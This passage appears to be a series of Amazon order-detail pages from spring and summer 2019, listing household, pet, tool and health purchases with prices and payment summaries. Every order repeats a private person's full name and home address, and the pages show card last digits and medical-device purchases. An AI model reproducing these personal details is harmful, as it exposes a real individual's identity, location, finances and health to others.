7528: July 25, 2019:$26.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5852827-3749840 Order Placed: July 22, 2019 Amazon.com order number: 111-5852827-3749840 Order Total: $36.62 Shipped on July 23, 2019 Items Ordered Price 1 of: Dyneema Denim Fabric Sold by The Foot, 62% Dyneema Polyethylene Fiber, 38% CottonNo Stretch -Blue Sold by: Rockywoods Fabrics (seller profile) $25.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $25.99 Visa | Last digits: 7528 Shipping & Handling: $8.56 Billing address Total before tax: $34.55Brian Coady Estimated tax to be collected: $2.071454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$36.62 United States Credit Card transactions Visa ending in 7528: July 23, 2019:$36.62 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1548246-1781040 Order Placed: July 22, 2019 Amazon.com order number: 111-1548246-1781040 Order Total: $14.97 Shipped on July 25, 2019 Items Ordered Price 1 of: Waterpik Convenient Hygienic Sturdy Storage Case for Replacement Tips, 6 Count Sold by: Amazon.com Services LLC $14.12 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Amazon Day Delivery Payment information Payment Method: Item(s) Subtotal: $14.12 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $14.12Brian Coady Estimated tax to be collected: $0.851454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$14.97 United States Credit Card transactions Visa ending in 7528: July 25, 2019:$14.97 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0435590-4388205 Order Placed: July 22, 2019 Amazon.com order number: 111-0435590-4388205 Order Total: $5.82 Shipped on July 23, 2019 Items Ordered Price 1 of: AmazonBasics USB 2.0 Printer Cable -A-Male to B-Male Cord -10 Feet (3 Meters) $5.49 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $5.49 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $5.49 Brian Coady Estimated tax to be collected: $0.33 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$5.82 United States Credit Card transactions Visa ending in 7528: July 23, 2019:$5.82 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6700715-6006644 Order Placed: July 17, 2019 Amazon.com order number: 111-6700715-6006644 Order Total: $15.88 Shipped on July 18, 2019 Items Ordered Price 1 of: 26 Pieces Waistband Extender Set Pants Waist Extenders and Buttons Extenders $14.98 for Dress Pants, Jeans and Skirts Sold by: Shappy Online (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $14.98 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $14.98Brian Coady Estimated tax to be collected: $0.901454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$15.88 United States Credit Card transactions Visa ending in 7528: July 18, 2019:$15.88 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1427230-8055467 Order Placed: July 16, 2019 Amazon.com order number: 111-1427230-8055467 Order Total: $42.33 Shipped on July 17, 2019 Items Ordered Price 1 of: Waterpik Water Flosser Electric Dental Countertop Oral Irrigator For Teeth – $79.99 Aquarius Professional, WP-663 Blue Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $79.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Deal of the Day:-$40.06 Billing address Brian Coady Total before tax: $39.931454 MONROE ST NW Estimated tax to be collected: $2.40WASHINGTON, DC 20010-3139 United States Grand Total:$42.33 Credit Card transactions Visa ending in 7528: July 17, 2019:$42.33 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0212910-7329870 Order Placed: July 16, 2019 Amazon.com order number: 111-0212910-7329870 Order Total: $163.61 Shipped on July 17, 2019 Items Ordered Price 1 of: Tide Free and Gentle Laundry Detergent Pods, 81 Count, Unscented and Hypoallergenic for Sensitive Skin $19.97 Unscented and Hypoallergenic for Sensitive Skin with Instant Stain Remover Liquid Pen, 3 Count Sold by: Amazon.com Services LLC Condition: New 1 of: SmilePowo 2 Pack NP-F970 Battery 7800mAh for Sony NP-F975, NP-F960, NPF950, NP-F930, NP-F770, NP-F750, NP-F550, DCR, DSR, HDR, FDR, HVR, HVL and LED Light Sold by: SmilePowo (seller profile) $38.99 Condition: New 1 of: "I and love and you" Purrky Turkey Recipe Grain Free Canned Cat Food, 3 oz (Pack of 24) Sold by: Amazon.com Services LLC $30.95 Condition: New 1 of: "I and love and you" Whascally Wabbit Recipe Grain Free Canned Cat Food, 3 Oz $31.99 (Pack Of 24) Sold by: Amazon.com Services LLC Condition: New 1 of: Yankee Candle Large Jar Candle Sage & Citrus $24.99 Sold by: Amazon.com Services LLC Condition: New 1 of: Burt's Bees Activated Coconut Charcoal Powder, Natural Flavor for Teeth $19.97 Whitening, 20g Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Shipped on July 16, 2019 Items Ordered Price 1 of: Swiffer Dusters Heavy Duty Extender Handle Starter Kit (1 Handle, 12 Dusters) $17.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Shipped on July 17, 2019 Items Ordered Price 1 of: Tide To Go Instant Stain Remover Liquid Pen, 3 Count $6.99 Unscented and Hypoallergenic for Sensitive Skin with Instant Stain Remover Liquid Pen, 3 Count Condition: New 1 of: "I and love and you" Chicken Me Out Recipe Grain Free Canned Cat Food, 3 oz $30.96 (Pack of 24) Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Part 1 of 2 -Tide Free and Gentle Laundry Detergent Pods, 81 Count, Sold by: Amazon.com Services LLC Payment Method: Item(s) Subtotal: $222.80 Visa | Last digits: 7528 Shipping & Handling: $0.00 Lightning Deal: -$12.65 Billing address Brian Coady Lightning Deal: -$32.88 1454 MONROE ST NW Deal of the Day: -$19.47 WASHINGTON, DC 20010-3139 ----United States Total before tax: $157.80 Estimated tax to be collected: $5.81 Grand Total:$163.61 Credit Card transactions Visa ending in 7528: July 17, 2019:$150.26 Visa ending in 7528: July 16, 2019: $13.35 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-6474122-2112213 Order Placed: July 16, 2019 Amazon.com order number: 111-6474122-2112213 Order Total: $173.71 Shipped on July 17, 2019 Items Ordered Price 1 of: Carbon Fiber wallet, Minimalist money clip slim metal wallet credit card holder men billfolds front pocket RFID Blocking wallet male EDC wallet Sold by: ARWTEK (seller profile) $26.99 Condition: New 1 of: Slice 10558 Smart-Retract Safety Box Cutter, Blade Automatically Retracts as Cutting Motion Finishes, Utility Knife with Finger Friendly Ceramic Blade, Blue Sold by: Amazon.com Services LLC $24.18 Condition: New 1 of: WEN 2305 Rotary Tool Kit with Flex Shaft Sold by: Amazon.com Services LLC $20.32 Condition: New 1 of: AvoDerm Natural Tuna & Crab Meat Entree in Gravy -24x3 oz Sold by: Amazon.com Services LLC $23.76 Condition: New 1 of: SportPet Designs Large Pop Open Kennel, Portable Cat Cage Kennel, Waterproof Pet bed, Carrier Collection Sold by: Amazon.com Services LLC $32.45 Condition: New 1 of: PetTest Advocate Monitoring Glucose Levels -Diabetes Testing Tools -Calibrated $29.95 for Pets -Bonus eOutletDeals Pet Towel (Starter Kit) Sold by: eOutletDeals (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Shipped on July 17, 2019 Items Ordered Price 1 of: Delectables Bisque Senior 15 Years + Lickable Wet Cat Treats , Tuna & Chicken, $9.59 12 Pack Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $167.24 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Prime Savings: -$2.03 Billing address Brian Coady Total before tax: $165.211454 MONROE ST NW Estimated tax to be collected: $8.50WASHINGTON, DC 20010-3139 United States Grand Total:$173.71 Credit Card transactions AmazonPLCC ending in 3157: July 17, 2019: $31.75 AmazonPLCC ending in 3157: July 17, 2019:$141.96 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-4110572-9321028 Order Placed: July 16, 2019 Amazon.com order number: 111-4110572-9321028 Order Total: $10.48 Shipped on July 17, 2019 Items Ordered Price 1 of: LifeStraw Personal Water Filter for Hiking, Camping, Travel, and Emergency Preparedness Sold by: Amazon.com Services LLC $17.47 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $17.47 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Deal of the Day: -$7.58 Billing address Brian Coady Total before tax: $9.891454 MONROE ST NW Estimated tax to be collected: $0.59WASHINGTON, DC 20010-3139 United States Grand Total:$10.48 Credit Card transactions AmazonPLCC ending in 3157: July 17, 2019:$10.48 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-8265532-1286648 Order Placed: July 12, 2019 Amazon.com order number: 112-8265532-1286648 Order Total: $40.81 Shipped on July 15, 2019 Items Ordered Price 1 of: Carbon Filter Media Roll -3/8" x 12" x 120" -Aquarium & Pond Filter Sold by: The Filter Pro (seller profile) $38.50 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $38.50 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $38.50 Brian Coady Estimated tax to be collected: $2.311454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$40.81 United States Credit Card transactions AmazonPLCC ending in 3157: July 15, 2019:$40.81 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-5594819-6378647 Order Placed: July 12, 2019 Amazon.com order number: 112-5594819-6378647 Order Total: $58.41 Shipped on July 14, 2019 Items Ordered Price 1 of: Koi Pond & Aquarium Filter Media (6 ft roll) $15.11 Sold by: Koral Filters (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on July 13, 2019 Items Ordered Price 1 of: Diabetes Blood Sugar Monitoring Kit for iPhone: Dario LC Blood Glucose $39.99 Monitoring System Includes Glucose Meter, 25 Test Strips, 10 Sterile Lancets, 10 Disposable Covers. All-in-One Glucometer Sold by: DarioHealth (seller profile) | Product question? Ask Seller FSA or HSA eligible Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $55.10 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Brian Coady Total before tax: $55.10 1454 MONROE ST NW Estimated tax to be collected: $3.31 WASHINGTON, DC 20010-3139 ----United States Grand Total:$58.41 FSA or HSA eligible FSA or HSA eligible amount (includes taxes & shipping): $42.39 Credit Card transactions AmazonPLCC ending in 3157: July 14, 2019:$16.02 AmazonPLCC ending in 3157: July 13, 2019:$42.39 To view the status of your order, return to Order Summary. Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-8530339-9352264 Subscribe and Save Order Placed: June 24, 2019 Amazon.com order number: 114-8530339-9352264 Order Total: $17.11 This order contains Subscribe & Save items. Shipped on July 5, 2019 Items Ordered Price 1 of: 4.4 LB Dishwasher Salt/Water Softener Salt -Compatible with Bosch, Miele, Whirlpool, Thermador and More (2 KG) Sold by: Impresa Products (seller profile) | Product question? Ask Seller $16.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $16.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.85 Billing address Total before tax: $16.14Brian Coady Estimated tax to be collected: $0.971454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$17.11 United States Credit Card transactions AmazonPLCC ending in 3157: July 5, 2019:$17.11 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-5693300-2489829 Order Placed: June 12, 2019 Amazon.com order number: 112-5693300-2489829 Order Total: $21.19 Shipped on June 12, 2019 Items Ordered Price 1 of: USB C Flash Drive, SAWAKE 64GB USB 3.0 Type C Waterproof Thumb Drive, Dual Drive Memory Stick with Keychain for Android Smartphone/New MacBook/Google's Chromebook Pixel Sold by: Firstmore (seller profile) $19.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $19.99 MasterCard | Last digits: 3104 Shipping & Handling: $0.00 Billing address Total before tax: $19.99 Brian Coady Estimated tax to be collected: $1.201454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$21.19 United States Credit Card transactions MasterCard ending in 3104: June 12, 2019:$21.19 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-3088336-7723410 Order Placed: June 6, 2019 Amazon.com order number: 112-3088336-7723410 Order Total: $35.32 Shipped on June 7, 2019 Items Ordered Price 1 of: Fiskars 385081-1001 Clearing Tools Hatchet Sold by: Amazon.com Services LLC $33.32 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $33.32 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $33.32 Brian Coady Estimated tax to be collected: $2.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$35.32 United States Credit Card transactions AmazonPLCC ending in 3157: June 7, 2019:$35.32 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-0122326-0110602 Order Placed: June 6, 2019 Amazon.com order number: 112-0122326-0110602 Order Total: $290.36 Shipped on June 10, 2019 Items Ordered Price 1 of: EGO 56 Volt Lithium-Ion $273.92 Sold by: supplyfully (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $273.92 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $273.92 Brian Coady Estimated tax to be collected: $16.441454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$290.36 United States Credit Card transactions AmazonPLCC ending in 3157: June 10, 2019:$290.36 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-7048841-3525059 Order Placed: May 15, 2019 Amazon.com order number: 112-7048841-3525059 Order Total: $21.18 Shipped on May 17, 2019 Items Ordered Price 2 of: But Frid 50 Piece Front Clear Plastic Ziplock Bags for Crafts Hang Hole Translucent $9.99 Heat Sealable Coffee Bags Heat Seal Sample Packs 8.5x13cm (3.3x5.1) (Translucent Matte Mixed, 50) Sold by: Sapedausy (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $19.98 MasterCard | Last digits: 3104 Shipping & Handling: $0.00 Billing address Total before tax: $19.98 Brian J Coady Estimated tax to be collected: $1.201454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$21.18 United States Credit Card transactions MasterCard ending in 3104: May 17, 2019:$21.18 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-7964373-1852227 Order Placed: May 10, 2019 Amazon.com order number: 112-7964373-1852227 Order Total: $17.55 Shipped on May 12, 2019 Items Ordered Price 1 of: Dry Brushing Body Brush -Natural Cactus Bristles (Extra Firm Bristles) Preferred By Therapists -Stimulate The Lymphatic System -Exfoliate Dead Skin Sold by: Creative Wholesaler (seller profile) $16.56 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $16.56 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $16.56Brian Coady Estimated tax to be collected: $0.991454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$17.55 United States Credit Card transactions AmazonPLCC ending in 3157: May 12, 2019:$17.55 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-2843608-5891430 Order Placed: April 28, 2019 Amazon.com order number: 112-2843608-5891430 Order Total: $0.38 Shipped on May 3, 2019 Items Ordered 1 of: Norman Lamps CFL26/UV/MED Germicidal UV Compact Germicidal Bulb, 120V, 26W Sold by: Amazon.com Services LLC Price $19.99 Condition: New 1 of: Coospider UVC Germicidal 36 Watt Self-Ballast E27 Screw Socket Lamp Light Bulb UV Ozone Disinfection Cleans Air (UVC with Ozone Replace Bulb) Sold by: Coospider (seller profile) $37.00 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Shipped on April 29, 2019 Items Ordered 1 of: Novogratz x Globe Hartford 18" Desk/Table Lamp, Matte Brass Finish, Matte White Shade, Toggle On/Off Switch 52096 Sold by: Amazon.com Services LLC Price $39.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Print this page for your records. Shipped on May 9, 2019 Items Ordered 2 of: Green Earth Plant Self Spikes System with Slow Release Control Valve Switch, Automatic Vacation Drip Irrigation Watering Devices,Care Your Indoor & Outdoor Home Office Plants-12 Pack Sold by: BEST NEW (seller profile) Price $12.90 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $122.78 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Rewards Points Total before tax: $122.78Billing address Estimated tax to be collected: $7.36Brian Coady Rewards Points:-$129.76 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total: $0.38United States Credit Card transactions AmazonPLCC ending in 3157: May 9, 2019:$0.38 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-0068271-8107447 Order Placed: April 27, 2019 Amazon.com order number: 112-0068271-8107447 Order Total: $30.00 Shipped on April 27, 2019 Items Ordered Price 2 of: Springstar S1524 Jumbo Clothes Moth Trap Sold by: GSM Sales (seller profile) $14.15 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $28.30 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $28.30 Brian Coady Estimated tax to be collected: $1.701454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$30.00 United States Credit Card transactions AmazonPLCC ending in 3157: April 27, 2019:$30.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-5920519-6872232 Order Placed: April 24, 2019 Amazon.com order number: 112-5920519-6872232 Order Total: $43.33 Shipped on April 25, 2019 Items Ordered Price 1 of: rOXIN 7W Aquarium Water Clean Light for Algae Bloom Green Clean Submersible $12.89 Light for Fish Tank Pump Sold by: JackSupermall (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on April 24, 2019 Items Ordered Price 1 of: Ultra Quiet Pet Water Fountain,Dog Filter Ultraviolet Sterilizing Lamp 2L,Cat $27.99 Water Dispenser,Dog Cat Water Fountain with LED Light,3 Ways to Enjoy Drinking Re-Circul Sold by: Pet Absolute (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $40.88 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $40.88Brian Coady Estimated tax to be collected: $2.451454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$43.33 United States Credit Card transactions AmazonPLCC ending in 3157: April 25, 2019:$13.66 AmazonPLCC ending in 3157: April 24, 2019:$29.67 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-4719552-6709819 Order Placed: April 24, 2019 Amazon.com order number: 112-4719552-6709819 Order Total: $31.77 Shipped on April 25, 2019 Items Ordered Price 3 of: ELEOPTION Pack of 4PCS Replacement Foam Filter For1.8L Large Capacity $9.99 Automatic Pets Water Drinking Filter Fountain Bowl For Dogs Cars (4PCS Carbon Filter) Sold by: Creeracity (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $29.97 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $29.97Brian Coady Estimated tax to be collected: $1.801454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$31.77 United States Credit Card transactions AmazonPLCC ending in 3157: April 25, 2019:$31.77 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-2716419-9935418 Order Placed: April 13, 2019 Amazon.com order number: 112-2716419-9935418 Order Total: $48.74 Shipped on April 15, 2019 Items Ordered Price 1 of: Triangle Germany Mezzaluna Knife, 7" Rust-Free Stainless Steel Curved Blade, $20.99 Professional-grade Design with Ergonomic Handles for Efficient Chopping and Mincing Sold by: MT BAKER MERCANTILE (seller profile) | Product question? Ask Seller Condition: New 1 of: Triangle Germany Mezzaluna Board, Professional-grade Cutting Block with Hollow $24.99 Center, Compatible with Curved Chopping Knives, Made from Sustainable Beechwood Sold by: MT BAKER MERCANTILE (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $45.98 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $45.98 Brian Coady Estimated tax to be collected: $2.761454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$48.74 United States Credit Card transactions Visa ending in 4401: April 15, 2019:$48.74 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-0038668-0256265 Order Placed: April 12, 2019 Amazon.com order number: 113-0038668-0256265 Order Total: $24.78 Shipped on April 13, 2019 Items Ordered Price 1 of: Ziploc 3 Jumbo big bags, 4 X-Large big bags, 5 Large big bags Sold by: Amazing Pride (seller profile) $23.38 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $23.38 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $23.38 Brian Coady Estimated tax to be collected: $1.401454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$24.78 United States Credit Card transactions Visa ending in 4401: April 13, 2019:$24.78 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-1195328-2885018 Order Placed: April 11, 2019 Amazon.com order number: 113-1195328-2885018 Order Total: $0.00 Shipped on April 14, 2019 Items Ordered 1 of: Ball Mason Jar-32 oz. Clear Glass Wide Mouth -Set of 4 Sold by: Aserson (seller profile) Price $0.00 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $0.00 Gift Card Shipping & Handling: $0.00 Billing address Total before tax: $0.00 Brian Coady Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$0.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-2815084-7971447 Order Placed: April 10, 2019 Amazon.com order number: 113-2815084-7971447 Order Total: $196.31 Shipped on April 11, 2019 Items Ordered Price 1 of: Stiletto TBM14RMC TiBone Mini-14 ounce Replaceable Milled Face Hammer with $185.20 a Curved 16" Titanium Handle Sold by: AlbanyToolCo. (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $185.20 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $185.20Brian Coady Estimated tax to be collected: $11.111454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$196.31 United States Credit Card transactions Visa ending in 4401: April 11, 2019:$196.31 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-9578042-4832213 Order Placed: April 10, 2019 Amazon.com order number: 113-9578042-4832213 Order Total: $15.69 Shipped on April 10, 2019 Items Ordered 1 of: Ball Mason Jar-32 oz. Clear Glass Wide Mouth -Set of 4 Sold by: Aserson (seller profile) Price $14.80 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $14.80 Visa | Last digits: 4401 Shipping & Handling: $0.00 Billing address Total before tax: $14.80 Brian Coady Estimated tax to be collected: $0.891454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$15.69 United States Credit Card transactions Visa ending in 4401: April 10, 2019:$15.69 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-2437191-7294609 Order Placed: April 10, 2019 Amazon.com order number: 113-2437191-7294609 Order Total: $31.74 Shipped on April 10, 2019 Items Ordered Price 1 of: Prepworks by Progressive 3-Piece Canning Essentials Kit Sold by: Amazon.com Services LLC $15.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Shipped on April 10, 2019 Items Ordered Price 1 of: Sauerkraut Pounder. Acacia wood tamper for vegetable fermentation. Fit wide $13.95 mouth and regular mouth mason jars, canning jars, fido jars, and ceramic crocks. Premium Present brand. Sold by: Save Big Depot (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $29.94 Visa | Last digits: 4401 Shipping & Handling: $0.00 ---- Billing address Total before tax: $29.94 Brian Coady Estimated tax to be collected: $1.80 1454 MONROE ST NW ---- WASHINGTON, DC 20010-3139 Grand Total:$31.74 United States Credit Card transactions Visa ending in 4401: April 10, 2019:$31.74 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #113-5385613-2715466 Order Placed: April 3, 2019 Amazon.com order number: 113-5385613-2715466 Order Total: $49.23 Shipped on April 4, 2019 Items Ordered Price 1 of: WirthCo 32425 Funnel King Propylene Drum Funnel with Lockable Lid -4 Quart $29.99 Capacity Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Shipped on April 4, 2019 Items Ordered Price 1 of: Lisle 19832 Plastic Funnel with Lid and Spout Cap -1.6 Quart Capacity $16.45 Sold by: Amazon.com Services LLC Condition: New 